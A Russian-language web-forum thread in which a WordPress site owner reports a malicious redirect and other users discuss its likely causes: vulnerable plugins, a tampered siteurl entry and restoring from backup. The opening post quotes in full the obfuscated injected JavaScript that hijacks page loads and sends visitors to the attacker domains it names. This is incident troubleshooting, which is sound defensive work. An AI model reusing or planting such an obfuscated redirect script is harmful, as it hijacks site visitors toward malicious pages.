Форум Сайтостроение Безопасность

Редирект при открытии сайта Вирус?

12
R
На сайте с 27.08.2011
Offline
108
Redje
1535

Сайт на WP.
При попытке открыть сайт, происходит редирект сначала на

/trick.trainresistor.cc/

потом на

/fingerprintopuch.best/go/

и вываливается кусок кода

window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));var ll=_0x2ca8a2(0x190);document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}

Чем может быть вызвано?
Вирус?

Проверка Aibolit -ом ничего не дала.
А вот Eset 32 ругается при открытии сайта

Aurums
На сайте с 28.02.2020
Offline
67
Aurums
#1
Redje :

Сайт на WP.
При попытке открыть сайт, происходит редирект сначала на

Попробуй wp-config.php поправить

подробней тут https://searchengines.guru/ru/forum/1050788

Заразили несколько сайтов, есть еще жертвы? - Безопасность - Сайтостроение - Форум об интернет-маркетинге
Заразили несколько сайтов, есть еще жертвы? - Безопасность - Сайтостроение - Форум об интернет-маркетинге
  • 2021.12.06
  • searchengines.guru
Сегодня обнаружил, что какой то нехороший человек заразил четыре сайта на WP. Редирект на belonnanotservice и дальше по цепочке...
R
На сайте с 27.08.2011
Offline
108
Redje
#2
Aurums #:

Попробуй wp-config.php поправить

подробней тут https://searchengines.guru/ru/forum/1050788

Вроде, стандартный конфиг.
Я восстановил сайт из бэкапа, но зараженные файлы могли остаться.
Знать бы где их искать....

Aurums
На сайте с 28.02.2020
Offline
67
Aurums
#3
Redje #:

Вроде, стандартный конфиг.
Я восстановил сайт из бэкапа, но зараженные файлы могли остаться.
Знать бы где их искать....

Посмотри плагины и темы уязвимые там указаны https://inforeactor.ru/401680-wordfence-zayavila-ob-atake-hakerov-na-bolee-chem-16-mln-veb-saitov-na-baze-wordpress

Wordfence заявила об атаке хакеров на более чем 1,6 млн веб-сайтов на базе WordPress
Wordfence заявила об атаке хакеров на более чем 1,6 млн веб-сайтов на базе WordPress
  • 2021.12.13
  • Мария Иванова
  • inforeactor.ru
Специалисты компании уточнили, что при совершении этих хакерских атак были использованы уязвимости WordPress-плагинов и тем Epsilon Framework. В частности, речь идет о плагинах PublishPress Capabilities, Kiwi Social Share, WordPress Automatic и Pinterest Automatic. Патчи, призванные обеспечить безопасность сайтов, появились еще в 2018 году...
M1
На сайте с 13.12.2021
Offline
0
mihael1ex
#4
Всем привет. Такая же фигня. Жулики 😠 каким-то образом получают доступ к mysql и меняют в таблице wp_options запись siteurl на свою левую ссылку. А редиректы это уже у них работают. И да, плагин PublishPress Capabilities (один из перечня по ссылке выше) тоже есть у меня в наличии. Может реально там и дыра.
W1
На сайте с 22.01.2021
Online
283
webinfo
#5
Redje #:
Я восстановил сайт из бэкапа, но зараженные файлы могли остаться.
Знать бы где их искать....

Надо было до восстановления из бэкапа искать. А так только всё усложнили. Ждите следующих взломов.

Мой форум - https://webinfo.guru –Там я всегда на связи
R
На сайте с 27.08.2011
Offline
108
Redje
#6
webinfo #:

Надо было до восстановления из бэкапа искать. А так только всё усложнили. Ждите следующих взломов.

Как искать, если даже Айболит ничего не находит? 
Зараженную версию сайта не удалил -  сохранилась.
На восстановленной из бэкапа - обновил все плагины и тему, удалил неиспользуемое - вдруг поможет? 

Смотрел файлы измененные за неделю до заражения, кроме картинок загружаемых на сайт, менялись только следующие файлы:

./wp-content/themes
./wp-content/themes/Newspaper
./wp-content/themes/Newspaper/style.css
./wp-content/themes/Newspaper/functions.php
./wp-content/themes/Newspaper/includes
./wp-content/themes/Newspaper/includes/js
./wp-content/themes/Newspaper/includes/js/page-template.php
./wp-content/plugins
./wp-content/plugins/ol_scrapes/logs/logs.txt
./wp-content/plugins/classic-editor
./wp-content/plugins/classic-editor/readme.txt
./wp-content/plugins/classic-editor/classic-editor.php
./wp-content/plugins/classic-editor/js
./wp-content/plugins/classic-editor/js/block-editor-plugin.js
./wp-content/plugins/classic-editor/LICENSE.md
./wp-content/languages/themes
./wp-content/languages/themes/wpml/tmp
./wp-content/languages/plugins
./wp-content/languages/plugins/classic-editor-ru_RU.po
./wp-content/languages/plugins/classic-editor-ru_RU.mo
./wp-content/upgrade

Евгений Крупченко
На сайте с 27.09.2003
Offline
178
Евгений Крупченко
#7
Redje #:
Знать бы где их искать
Как искать

 Можно и в личку заглянуть для разнообразия.

W1
На сайте с 22.01.2021
Online
283
webinfo
#8
Redje #:

Как искать, если даже Айболит ничего не находит? 

Я вот тоже не умею двигатель автомобиля перебирать – но ничего, в автосервисе справляются.

Redje #:

Зараженную версию сайта не удалил -  сохранилась.

А толку с неё, если файлы уже снесены со своих мест?

Redje #:
Смотрел файлы измененные за неделю до заражения

Я за год смотрю. Но сейчас это уже бесполезно - вы изменили все файлы своим бэкапом.

Vladimir
На сайте с 07.06.2004
Offline
530
Vladimir
#9
webinfo #:

Я за год смотрю. Но сейчас это уже бесполезно - вы изменили все файлы своим бэкапом.

Делать похоже нечего, обновляем все файлы движка, и закрываем доступ к нему
Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
R
На сайте с 27.08.2011
Offline
108
Redje
#10
webinfo #:
Я вот тоже не умею двигатель автомобиля перебирать – но ничего, в автосервисе справляются.

Если принятые меры не помогут, буду обращаться. 

А так, восстановление  из резервной копи предшествующей заражению, с последующим обновлением и закрытием известных дыр, вполне себе метод. 

webinfo #:
А толку с неё, если файлы уже снесены со своих мест?

Просто переименовываете папку с сайтом, добавив префикс -old, а бекап восстанавливаете в новую директорию. И все остается на своих местах.   

Евгений Крупченко #:
Можно и в личку заглянуть для разнообразия.

Спасибо

Google добавил в состав Посоветуйте параллельный метод работы Как заблокировать фейковых google
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий